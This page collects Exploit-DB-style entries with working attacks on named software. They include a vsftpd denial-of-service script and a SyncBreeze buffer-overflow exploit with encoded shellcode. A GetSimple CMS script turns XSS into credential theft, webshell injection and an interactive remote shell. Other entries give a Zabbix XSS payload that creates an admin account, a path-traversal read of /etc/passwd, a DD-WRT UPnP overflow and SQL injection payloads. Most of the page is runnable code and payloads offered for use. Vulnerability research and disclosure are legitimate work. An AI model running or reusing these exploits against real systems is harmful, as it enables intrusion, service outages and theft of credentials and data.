ISHACK AI BOT

# Exploit Title: vsftpd 3.0.3 - Remote Denial of Service # Date: 22-03-2021 # Exploit Author: xynmaps # Vendor Homepage: https://security.appspot.com/vsftpd.html # Software Link: https://security.appspot.com/downloads/vsftpd-3.0.3.tar.gz # Version: 3.0.3 # Tested on: Parrot Security OS 5.9.0 #-------------------------------# #encoding=utf8 #__author__ = XYN/Dump/NSKB3 #VSFTPD Denial of Service exploit by XYN/Dump/NSKB3. """ VSFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server, you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited. (if it's limited, just run this script from different proxies using proxychains, and it will work) """ import socket import sys import threading import subprocess import time banner = """ ._________________. | VS-FTPD | | D o S | |_________________| |By XYN/DUMP/NSKB3| |_|_____________|_| |_|_|_|_____|_|_|_| |_|_|_|_|_|_|_|_|_| """ usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0]) def test(t,p): s = socket.socket() s.settimeout(10) try: s.connect((t, p)) response = s.recv(65535) s.close() return 0 except socket.error: print("Port {} is not open, please specify a port that is open.".format(p)) sys.exit() def attack(targ, po, id): try: subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) #print("Worker {} running".format(id)) except OSError: pass def main(): global target, port, start print banner try: target = sys.argv[1] except: print usage sys.exit() try: port = int(sys.argv[2]) except: port = 21 try: conns = int(sys.argv[3]) except: conns = 50 print("[!] Testing if {0}:{1} is open".format(target, port)) test(target, port) print("[+] Port {} open, starting attack...".format(port)) time.sleep(2) print("[+] Attack started on {0}:{1}!".format(target, port)) def loop(target, port, conns): global start threading.Thread(target=timer).start() while 1: for i in range(1, conns + 3): t = threading.Thread(target=attack, args=(target,port,i,)) t.start() if i > conns + 2: t.join() break loop() t = threading.Thread(target=loop, args=(target, port, conns,)) t.start() def timer(): start = time.time() while 1: if start < time.time() + float(900): pass else: subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) t = threading.Thread(target=loop, args=(target, port,)) t.start() break main()

# Exploit Title: TP-Link Devices - 'setDefaultHostname' Stored Cross-site Scripting (Unauthenticated) # Date: 24-07-2020 # Exploit Author: Smriti Gaba, Kaustubh Padwad # Vendor Homepage: https://www.tp-link.com # Version: Multiple ============================================================== Unauthenticated Stored Cross-site Scripting in Multiple TP-Link Devices ============================================================== Overview ======== Products: 1. DSL and DSL Gateway 2. Access Points 3. WIFI Routers Tested Version: : Multiple versions of DSL & DSL Gateway, WIFI Routers and Access Points including: ------------------------------------------------------------------------------- Model | Firmware Version | ------------------------------------------------------------------------------- TD-W9977 | TD-W9977v1_0.1.0_0.9.1_up_boot(161123)_2016-11-23_15.36.15 | TL-WA801ND | TL-WA801NDv5_US_0.9.1_3.16_up_boot[170905-rel56404] | TL-WA801N | TL-WA801Nv6_EU_0.9.1_3.16_up_boot[200116-rel61815] | TL-WR802N | TL-WR802Nv4_US_0.9.1_3.17_up_boot[200421-rel38950] | Archer-C3150 | ArcherC3150(US)_V2_170926) | ------------------------------------------------------------------------------- Severity: Med-High About the Product: ================== * The (products from above list) are high performance WIFI Routers(Wireless AC routers), Access Points, ADSL + DSL Gateways and Routers. * Provides Configuration modes: Access Point mode, Router Mode, Range Extender mode. * Provide Ethernet and other interfaces to meet the access requirements of different devices. * It can provide high-performance functionalities, services for home users, individual users, and businesses. * Supports multiple functionalities including CWMP management, TR069 Configuration, SNMP management, Traffic statistics, etc. Description: ============ An issue was discovered, common to all the TP-Link products including WIFI Routers(Wireless AC routers), Access Points, ADSL + DSL Gateways and Routers. This affected TD-W9977v1,TL-WA801NDv5, TL-WA801Nv6, TL-WA802Nv5, Archer C3150v2 devices. A malicious XSS payload if injected in hostname of Wireless Client devices connected to TP-Link device, allows remote attackers to execute unauthenticated malicious scripts because of improper validation of hostname. Some of the pages including dhcp.htm, networkMap.htm, dhcpClient.htm, qsEdit.htm, qsReview.htm and others use this vulnerable hostname function(setDefaultHostname()) without sanitization and push the value of hostname ($defaulthostname) directly to the ACT stack along with other parameters. The ACT stack is called on for multiple operation ids covering LAN, WAN and while intialisation of multiple tables (arp, dhcp, client list) across the device. For example, ACT_SET stack for WAN_IP_CONN is called while dhcp operation, during which value of vulnerable defaulthostname is being assigned to parameter X_TP_Hostname and pushed to stack. This causes XSS at all the endpoints which display hostname for example: Wireless client information table, ARP bind table such as networkMap, DHCP. Additional Information ======================== The hostname value is only validated on ASCII characters, while there is no validation for Non-ASCII characters which allows hostname with XSS payload say "<script>alert('XSS')</script>" to execute. This value of hostname is pushed to an array as plain text along with IP address and MAC address in initClientListTable() function, and other tables use the same value of hostname accross the device. This array is then returned to the callback function which in turn is called from proxy.js. This data is pushed to stack corresponding to operation:"LAN_HOST_ENTRY" (vary for different firmware), operation id: "gl" (gl is getList function). As client initiates request with operation id:"LAN_HOST_ENTRY" and oid: "gl", $dm.getList and $.act is called which fetches the corresponding stack and sends data to ajax call. The crafted value of hostname is sent to the device and results in execution of payload. [Affected Component] hostName parameter inside different htm pages including DHCP, DhcpAP, ArpBind, networkMap. ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Malicious payload execution on initiating request for Wireless Client List table or DHCP html page. [Vulnerability Type] ==================== Stored Cross-site Scripting How to Reproduce: (POC): ======================== 1. Change the default hostname of wireless client by using following command (for Linux): a. vi /etc/dhcp/dhclient.conf b. Insert and change the value of hostname to xss payload "<script>alert('XSS')</script>" 2. Renew IP address by sending DHCP request to TP-Link device via following command: a. vi /etc/network/interfaces b. Add these lines: auto wlan0 iface wlan0 inet dhcp c. On Terminal run command: ifup wlan0 3. Login to the router web interface, navigate to DHCP settings or Wireless Client tab. 4. As soon as DHCP or Wireless client table is requested Xss payload executes and pops up alert box. Mitigation ========== --------------------------------------------------------------------------------------------------------- | Model | Firmware Version | Mitigation Comments | --------------------------------------------------------------------------------------------------------- | TL-WA801ND | TL-WA801NDv5_US_0.9.1_3.16_up_boot[170905-rel56404] | Patched | | TL-WA801N | TL-WA801Nv6_EU_0.9.1_3.16_up_boot[200116-rel61815] | Patched | | TL-WR802N | TL-WR802Nv4_US_0.9.1_3.17_up_boot[200421-rel38950] | Patched | | Archer-C3150 | ArcherC3150(US)_V2_170926) | EOL Product | | TD-W9977 | TD-W9977v1_0.1.0_0.9.1_up_boot(161123)_2016-11-23_15.36.15 | EOL Product | --------------------------------------------------------------------------------------------------------- Link for patched software version for products: 1. TL-WA801ND - https://tp-link.com/beta/2021/202101/20210120/TL-WA801NDv5_US_0.9.1_3.16_up_boot[210119-rel61453].zip 2. TL-WA801N - https://tp-link.com/beta/2021/202101/20210120/TL-WA801Nv6_EU_0.9.1_3.16_up_boot[210119-rel62190].zip 3. TL-WR802N - https://tp-link.com/beta/2021/202101/20210120/TL-WR802Nv4_US_0.9.1_3.17_up_boot[210119-rel63071].zip [Vendor of Product] TP-LINK (https://www.tp-link.com) Disclosure Timeline: =================== 24-July-2020 Discoverd the vulnerability 11-Aug-2020 Responsibly disclosed vulnerability to vendor 15-Aug-2020 Vendor Acknowledged the disclosure 17-Nov-2020 Communicated with vendor after 90 days for updates 19-Nov-2020 Vendor asked for model and version details 20-Nov-2020 Provided the required details to vendor 25-Nov-2020 Vendor provided software build to verify the issue 9-Dec-2020 Issue not fixed in the provided software. 4-Jan-2021 Asked Updates on the status of the issue. 20-Jan-2021 Vendor provided software build to verify the issue. 20-Jan-2021 Issue found fixed in the provided software. 21-Jan-2021 Requested for CVE-ID assignment 25-March-2021 CVE-ID Assigned. credits: ======== * Smriti Gaba * Kaustubh Padwad

# Exploit Title: Equipment Inventory System 1.0 - 'multiple' Stored XSS # Exploit Author: Jitendra Kumar Tripathi # Vendor Homepage: https://www.sourcecodester.com/php/11327/equipment-inventory.html # Software Link: https://www.sourcecodester.com/download-code?nid=11327&title=Equipment+Inventory+System+using+PHP+with+Source+Code # Version: 1 # Tested on Windows 10 + Xampp 8.0.3 Vulnerable Parameters: Item List , Employee Details , Position of Employee *Steps to reproduce:* 1: Log in with a valid username and password. 2: Navigate to http://localhost/deped/admin/item.php Add Item Payload : <script>alert(1)</script> Navigate to http://localhost/deped/admin/employee.php Add Employee Payload : <script>alert(2)</script> Post Saved Sucessfully , reload your page or navigate to any page you will see these XSS triggered.

# Exploit Title: Concrete5 8.5.4 - 'name' Stored XSS # Date: 2021-01 # Exploit Author: Quadron Research Lab # Version: Concrete5 8.5.4 # Tested on: Windows 10 x64 HUN/ENG Professional # Vendor: Concrete5 CMS (https://www.concrete5.org) # CVE: CVE-2021-3111 [Suggested description] The Express Entries Dashboard inConcrete5 8.5.4 allows stored XSS via the name field of a new data object at anindex.php/dashboard/express/entries/view/ URI. [Attack Vectors] Creating a new data object, the name field is not filtered. It is possible to place JavaScript code. [Stored XSS] Proof of Concept https://github.com/Quadron-Research-Lab/CVE/blob/main/CVE-2021-3111.pdf

# Exploit Title: Budget Management System 1.0 - 'Budget title' Stored XSS # Exploit Author: Jitendra Kumar Tripathi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14403/budget-management-system.html # Version: 1 # Tested on Windows 10 + Xampp 8.0.3 XSS IMPACT: 1: Steal the cookie 2: User redirection to a malicious website Vulnerable Parameters: Customer Details *Steps to reproduce:* Add Budget Title Payload : <script>alert(1)</script> Reload the http://localhost/Budget%20Management%20System/index.php or update the budget , the xss will get triggered.

# Exploit Title: Novel Boutique House-plus 3.5.1 - Arbitrary File Download # Date: 27/03/2021 # Exploit Author: tuyiqiang # Vendor Homepage: https://xiongxyang.gitee.io/ # Software Link: https://gitee.com/novel_dev_team/novel-plus,https://github.com/201206030/novel-plus # Version: all # Tested on: linux Vulnerable code: com/java2nb/common/controller/FileController.java @RequestMapping(value = "/download") public void fileDownload(String filePath,String fileName, HttpServletResponse resp) throws Exception { String realFilePath = jnConfig.getUploadPath() + filePath; InputStream in = new FileInputStream(realFilePath); fileName = URLEncoder.encode(fileName, "UTF-8"); resp.setHeader("Content-Disposition", "attachment;filename=" + fileName); resp.setContentLength(in.available()); OutputStream out = resp.getOutputStream(); byte[] b = new byte[1024]; int len = 0; while ((len = in.read(b)) != -1) { out.write(b, 0, len); } out.flush(); out.close(); in.close(); } Guide: 1. Log in to background management 2. http://xxxx/common/sysFile/download?filePath=../../../../../../../../../../../../../../../../../etc/passwd&fileName=passwd

# Exploit Title: SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow # Date: 03/27/2021 # Author: Filipe Oliveira - filipecenturiao[at]hotmail.com Rafael Machado - nnszs[at]protonmail.com # Vendor: https://www.syncbreeze.com/ # Software Link: https://www.4shared.com/file/57pE4sZfiq/syncbreeze_setup_v10116.html # Version: SyncBreeze v10.1.16 x86 # Tested on: Windows 10 x64 (19042.867) # CVE: CVE-2017-15950 Usage: The exploit will generate a POC file, called xplSyncBreeze.xml. Launch the application and click on Import Command, then load the POC file. # -*- coding: utf-8 -*- import struct # badchars #\x00\x0a\x0d\x20\x27 #\x81\x82\x83\x84\x85\x86\x87\x88 #\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90 #\x91\x92\x93\x94\x95\x96\x97\x98 #\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0 #\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8 #\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0 #\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8 #\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0 #\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8 #\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0 #\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8 #\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0 #\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8 #\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0 #\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8 #\xF9\xFA\xFB\xFC\xFD\xFE\xFF # Shellcode payload size: 432 bytes # msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -b '\x00\x0A\x0D\x20\x27' -v shellcode -f python shellcode = b"" shellcode += b"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49" shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a" shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51" shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x69" shellcode += b"\x78\x4e\x62\x75\x50\x77\x70\x35\x50\x45\x30" shellcode += b"\x4b\x39\x59\x75\x55\x61\x39\x50\x52\x44\x4e" shellcode += b"\x6b\x42\x70\x50\x30\x6e\x6b\x42\x72\x54\x4c" shellcode += b"\x6c\x4b\x70\x52\x74\x54\x4c\x4b\x62\x52\x66" shellcode += b"\x48\x44\x4f\x48\x37\x61\x5a\x51\x36\x45\x61" shellcode += b"\x39\x6f\x6e\x4c\x75\x6c\x43\x51\x71\x6c\x65" shellcode += b"\x52\x56\x4c\x47\x50\x4b\x71\x38\x4f\x74\x4d" shellcode += b"\x37\x71\x49\x57\x38\x62\x7a\x52\x52\x72\x36" shellcode += b"\x37\x4c\x4b\x63\x62\x42\x30\x6c\x4b\x31\x5a" shellcode += b"\x57\x4c\x4c\x4b\x32\x6c\x36\x71\x31\x68\x4a" shellcode += b"\x43\x47\x38\x47\x71\x4a\x71\x76\x31\x6c\x4b" shellcode += b"\x36\x39\x67\x50\x66\x61\x58\x53\x4c\x4b\x70" shellcode += b"\x49\x66\x78\x59\x73\x34\x7a\x53\x79\x6e\x6b" shellcode += b"\x50\x34\x4c\x4b\x66\x61\x4e\x36\x55\x61\x39" shellcode += b"\x6f\x4c\x6c\x4a\x61\x4a\x6f\x34\x4d\x67\x71" shellcode += b"\x48\x47\x67\x48\x69\x70\x71\x65\x59\x66\x54" shellcode += b"\x43\x63\x4d\x79\x68\x75\x6b\x73\x4d\x67\x54" shellcode += b"\x44\x35\x79\x74\x72\x78\x4e\x6b\x53\x68\x71" shellcode += b"\x34\x57\x71\x5a\x73\x52\x46\x6c\x4b\x36\x6c" shellcode += b"\x72\x6b\x6c\x4b\x76\x38\x75\x4c\x67\x71\x68" shellcode += b"\x53\x6e\x6b\x57\x74\x4e\x6b\x63\x31\x78\x50" shellcode += b"\x6f\x79\x73\x74\x47\x54\x64\x64\x53\x6b\x31" shellcode += b"\x4b\x63\x51\x50\x59\x63\x6a\x43\x61\x39\x6f" shellcode += b"\x59\x70\x73\x6f\x31\x4f\x62\x7a\x4e\x6b\x44" shellcode += b"\x52\x6a\x4b\x4e\x6d\x53\x6d\x73\x5a\x63\x31" shellcode += b"\x4c\x4d\x4d\x55\x6f\x42\x75\x50\x47\x70\x33" shellcode += b"\x30\x46\x30\x50\x68\x74\x71\x6c\x4b\x42\x4f" shellcode += b"\x6e\x67\x39\x6f\x6e\x35\x6f\x4b\x58\x70\x78" shellcode += b"\x35\x79\x32\x46\x36\x33\x58\x79\x36\x4c\x55" shellcode += b"\x4f\x4d\x6d\x4d\x39\x6f\x6a\x75\x55\x6c\x63" shellcode += b"\x36\x61\x6c\x45\x5a\x6d\x50\x49\x6b\x39\x70" shellcode += b"\x32\x55\x75\x55\x6d\x6b\x57\x37\x64\x53\x74" shellcode += b"\x32\x52\x4f\x50\x6a\x53\x30\x61\x43\x59\x6f" shellcode += b"\x78\x55\x73\x53\x30\x61\x30\x6c\x72\x43\x43" shellcode += b"\x30\x41\x41" # padding to crash buffer basura = struct.pack('<L', 0x41414141) * 390 # gadgets to move payload pointer into EAX GAD1 = struct.pack('<L', 0x65235465) # XCHG EAX,EBP GAD2 = struct.pack('<L', 0x6506537C) # CALL EAX # padding to reach buffer address stored in ebp basura2 = struct.pack('<L', 0x41414141) * 56 # padding for stack pivot padding = struct.pack('<L', 0x41414141) * 4 padding2 = struct.pack('<L', 0x41414141) * 20 # stack pivot to reach an area with more space for gadgets on the stack # 0x6506491c: add esp, 0x48 ; pop edi ; pop esi ; ret pivot = struct.pack('<L', 0x6506491c) # final payload fruta = basura + pivot + padding + padding2 + GAD1 + GAD2 + basura2 + shellcode # write payload to xml file payload = open("xplSyncBreeze.xml", "wb") payload.write("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n".encode('utf-8')) payload.write("<sync name='".encode('utf-8')) payload.write(fruta) payload.write("'>\n</sync>\n".encode('utf-8')) payload.close()

# Exploit Title: GetSimple CMS 3.3.16 - Reflected XSS to RCE # Exploit Author: Bobby Cooke (boku) # Discovery Credits: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) # Date: March 29th, 2021 # CVE ID: CVE-2020-23839 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-23839 # Vendor Homepage: http://get-simple.info # Software Link: http://get-simple.info/download/ # Version: v3.3.16 # Tested against Server Host: Windows 10 Pro + XAMPP # Tested against Client Browsers: Firefox(Linux), Chrome (Linux & Windows), Edge # Full Disclosure & Information at: https://github.com/boku7/CVE-2020-23839 # Vulnerability Description: # GetSimple CMS v3.3.16 suffers from a Reflected XSS on the Admin Login Portal. On August 12th, 2020, the vendor received full disclosure details of the vulnerability via private email. The vulnerability was publicly disclosed on September 13th, 2020 # via MITRE with the publication of CVE-2020-23839, which contained little details and no proof of concept. On January 20th, 2021 full disclosure and code analysis was publicly disclosed under the GetSimple CMS GitHub active issues ticket. # Exploit Description: # This exploit creates a Reflected XSS payload, in the form of a hyperlink, which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation # attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system. # Attack Chain: # 1. Attacker tricks GetSimple CMS Admin to go to the URL provided from this exploit # 2. Admin then enters their credentials into the GetSimple CMS login portal # 3. Reflected XSS Payload triggers onAction when the Admin clicks the Submit button or presses Enter # 4. The XSS payload performs an XHR POST request in the background, which logs the browser into the GetSimple CMS Admin panel # 5. The XSS payload then performs a 2nd XHR GET request to admin/edit-theme.php, and collects the CSRF Token & Configured theme for the webpages hosted on the CMS # 6. The XSS payload then performs a 3rd XHR POST request to admin/edit-theme.php, which injects a PHP backdoor WebShell to all pages of the CMS # 7. The exploit repeatedly attempts to connect to the public /index.php page of the target GetSimple CMS system until a WebShell is returned # 8. When the exploit hooks to the WebShell, an interactive PHP WebShell appears in the attackers console import sys,re,argparse,requests from urllib.parse import quote from colorama import (Fore as F, Back as B, Style as S) from time import sleep FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT def bullet(char,color): C=FB if color == 'B' else FR if color == 'R' else FG return SB+FB+'['+ST+SB+char+SB+FB+']'+ST+' ' info,err,ok = bullet('-','B'),bullet('-','R'),bullet('+','G') def webshell(SERVER_URL): try: WEB_SHELL = SERVER_URL getdir = {'FierceGodKick': 'echo %CD%'} r = requests.post(url=WEB_SHELL, data=getdir, verify=False) status = r.status_code cwd = re.findall(r'[CDEF].*', r.text) if cwd: cwd = cwd[0]+"> " term = SB+FG+cwd+FT print(SD+FR+')'+FY+'+++++'+FR+'['+FT+'=========>'+ST+SB+' WELCOME BOKU '+ST+SD+'<========'+FR+']'+FY+'+++++'+FR+'('+FT+ST) while True: thought = input(term) command = {'FierceGodKick': thought} r = requests.post(WEB_SHELL, data=command, verify=False) status = r.status_code if status != 200: r.raise_for_status() response = r.text print(response) else: r.raise_for_status() except: pass def urlEncode(javascript): return quote(javascript) def genXssPayload(): XSS_PAYLOAD = '/index/javascript:' XSS_PAYLOAD += 'var s = decodeURIComponent("%2f");' XSS_PAYLOAD += 'var h = "application"+s+"x-www-form-urlencoded";' XSS_PAYLOAD += 'var e=function(i){return encodeURIComponent(i);};' XSS_PAYLOAD += 'var user = document.forms[0][0].value;' XSS_PAYLOAD += 'var pass = document.forms[0][1].value;' XSS_PAYLOAD += 'var u1 = s+"admin"+s;' XSS_PAYLOAD += 'var u2 = u1+"theme-edit.php";' XSS_PAYLOAD += 'var xhr1 = new XMLHttpRequest();' XSS_PAYLOAD += 'var xhr2 = new XMLHttpRequest();' XSS_PAYLOAD += 'var xhr3 = new XMLHttpRequest();' XSS_PAYLOAD += 'xhr1.open("POST",u1,true);' XSS_PAYLOAD += 'xhr1.setRequestHeader("Content-Type", h);' XSS_PAYLOAD += 'params = "userid="+user+"&pwd="+pass+"&submitted=Login";' XSS_PAYLOAD += 'xhr1.onreadystatechange = function(){' XSS_PAYLOAD += 'if (xhr1.readyState == 4 && xhr1.status == 200) {' XSS_PAYLOAD += 'xhr2.onreadystatechange = function(){' XSS_PAYLOAD += 'if (xhr2.readyState == 4 && xhr2.status == 200) {' XSS_PAYLOAD += 'r=this.responseXML;' XSS_PAYLOAD += 'nVal = r.querySelector("#nonce").value;' XSS_PAYLOAD += 'eVal = r.forms[1][2].defaultValue;' XSS_PAYLOAD += 'xhr3.open("POST",u2,true);' XSS_PAYLOAD += 'xhr3.setRequestHeader("Content-Type", h);' XSS_PAYLOAD += 'payload=e("<?php echo shell_exec($_REQUEST[FierceGodKick]) ?>");' XSS_PAYLOAD += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";' XSS_PAYLOAD += 'xhr3.send(params);' XSS_PAYLOAD += '}};' XSS_PAYLOAD += 'xhr2.open("GET",u2,true);' XSS_PAYLOAD += 'xhr2.responseType="document";' XSS_PAYLOAD += 'xhr2.send();' XSS_PAYLOAD += '}};' XSS_PAYLOAD += 'xhr1.send(params);' XSS_PAYLOAD += '%2f%2f' return XSS_PAYLOAD def argsetup(): about = SB+FT+'This exploit creates a Reflected XSS payload, in the form of a hyperlink, which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.'+ST parser = argparse.ArgumentParser(description=about) parser.add_argument('TargetSite',type=str,help='The routable domain name of the target site') args = parser.parse_args() return args if __name__ == "__main__": print(SB+FB+'Exploit Author'+FT+': '+FB+'Bobby Cooke'+FT+FB) print(SB+FR+' CVE-2020-23839 '+FT+'|'+FR+' GetSimpleCMS v3.3.16 '+FT) print(FR+'Reflected XSS '+FT+'->'+FR+' CredHarvest Payload '+FT+'->'+FR+' XHR Chaining '+FT+'->'+FR+' RCE'+ST) args = argsetup() RHOST = args.TargetSite WEBAPP_URL = RHOST+'/admin/' WEBAPP_URL = WEBAPP_URL+'index.php' PAYLOAD = genXssPayload() ENCODED_PAYLOAD = urlEncode(PAYLOAD) print(info+FT+'Have a '+SB+FB+'GetSimpleCMS '+SB+FC+'Admin '+ST+'go to this '+SB+FM+'URL & login'+ST+', and you will get an '+SB+FR+'RCE WebShell'+ST) print(SB+FB+WEBAPP_URL+ENCODED_PAYLOAD+ST) sleep(1) print(ok+'Waiting for Admin to login with creds, which will trigger the RCE XHR attack chain..') while True: sleep(1) webshell(RHOST)

# Exploit Title: Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting # Date: 3/30/2021 # Exploit Author: cmOs # Vendor Homepage: https://openlitespeed.org/ # Software Link: https://openlitespeed.org/kb/install-from-binary/ # Version: 1.7.9 # Tested on Ubuntu 20.04 Step 1: Log in to the dashboard using the Administrator account Step 2: Go to Listeners > Summary > Actions (View) > Edit Step 3: Inject XSS_Payload to "Notes" parameter Step 4: Graceful Restart Step 5: Trigger XSS when Administrator click on Default Icon [POC] POST /view/confMgr.php HTTP/1.1 Host: 127.0.0.1:7080 Connection: close Content-Length: 163 sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99" Accept: text/html, */*; q=0.01 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://127.0.0.1:7080 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://127.0.0.1:7080/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: LSUI37FE0C43B84483E0=325275ee1caf0c970c4ae7960d30f0a6; litespeed_admin_lang=english; LSID37FE0C43B84483E0=kWLbCk%2F0XX0%3D; LSPA37FE0C43B84483E0=I%2Fpkx%2FeQg4s%3D name=Default&ip=ANY&port=8088&reusePort=&secure=0&note=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&a=s&m=sl_Default&p=lg&t=L_GENERAL&r=Default&tk=0.04356800+1617073257

# Exploit Title: Zabbix 3.4.7 - Stored XSS # Date: 30-03-2021 # Exploit Author: Radmil Gazizov # Vendor Homepage: https://www.zabbix.com/ # Software Link: https://www.zabbix.com/rn/rn3.4.7 # Version: 3.4.7 # Tested on: Linux # Reference - https://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt 1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382) 2- Create new dashboard 3- Add a new widget => Type: Map nabigation tree 4- Past into parameter "Name": <img src="x" onerror="var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});"> 5- Click to "Add" button

# Exploit Title: DD-WRT 45723 - UPNP Buffer Overflow (PoC) # Date: 24.03.2021 # Exploit Author: Selim Enes 'Enesdex' Karaduman # Vendor Homepage: https://dd-wrt.com/ # Software Link: https://download1.dd-wrt.com/dd-wrtv2/downloads/betas/2021/ # Version: 45723 or prior # Tested on: TP-Link Archer C7 # https://ssd-disclosure.com/ssd-advisory-dd-wrt-upnp-buffer-overflow/ import socket target_ip = "192.168.2.1" # IP Address of Target off = "D"*164 ret_addr = "AAAA" payload = off + ret_addr packet = \ 'M-SEARCH * HTTP/1.1\r\n' \ 'HOST:239.255.255.250:1900\r\n' \ 'ST:uuid:'+payload+'\r\n' \ 'MX:2\r\n' \ 'MAN:"ssdp:discover"\r\n' \ '\r\n' s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) s.sendto(packet, (target_ip, 1900) )

# Exploit Title: CourseMS 2.1 - 'name' Stored XSS # Date: 03/30/2021 # Exploit Author: cptsticky # Vendor Homepage: http://sourceforge.net/projects/coursems # Software Link: https://sourceforge.net/projects/coursems/files/latest/download # Version: 2.1 # Tested on: Ubuntu 20.04 POST /coursems/admin/add_jobs.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 91 Origin: http://localhost Connection: close Referer: http://localhost/coursems/admin/add_jobs.php Cookie: PHPSESSID=9c5cgusplbmb09g86sfapoiie4; __utma=2772400.1964691305.1617119061.1617119061.1617119061.1; __utmb=2772400.87.10.1617119061; __utmc=2772400; __utmz=2772400.1617119061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) Upgrade-Insecure-Requests: 1 name=dirkgently%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&add_jobs=Add+Job+Title Anyone who visits the http://localhost/coursems/add_user.php will prompt execution of the stored XSS

# Exploit Title: Latrix 0.6.0 – 'txtaccesscode' SQL Injection # Date: 03/30/2021 # Exploit Author: cptsticky # Vendor Homepage: https://sourceforge.net/projects/latrix # Software Link: https://sourceforge.net/projects/latrix/files/latest/download # Version: 0.6.0 # Tested on: Ubuntu 20.04 POST /latrix/inandout.php HTTP/1.1 Host: 18.222.194.190 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 34 Origin: http://18.222.194.190 Connection: close Referer: http://18.222.194.190/latrix/inandoutcode.php?target=inandout Cookie: PHPSESSID=q9b6a0e050sl6jae7u64usvrs1 Upgrade-Insecure-Requests: 1 txtaccesscode=111&btnsubmit=Submit Command used to prove injection: sqlmap -r bam.txt -p txtaccesscode Output ----------------snip---------------- sqlmap resumed the following injection point(s) from stored session: --- Parameter: txtaccesscode (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: txtaccesscode=-3451' OR 7070=7070#&btnsubmit=Submit Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: txtaccesscode=111' AND GTID_SUBSET(CONCAT(0x716b627a71,(SELECT (ELT(2717=2717,1))),0x71786a7071),2717)-- GnJe&btnsubmit=Submit Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: txtaccesscode=111' AND (SELECT 8547 FROM (SELECT(SLEEP(5)))qHfx)-- tljS&btnsubmit=Submit 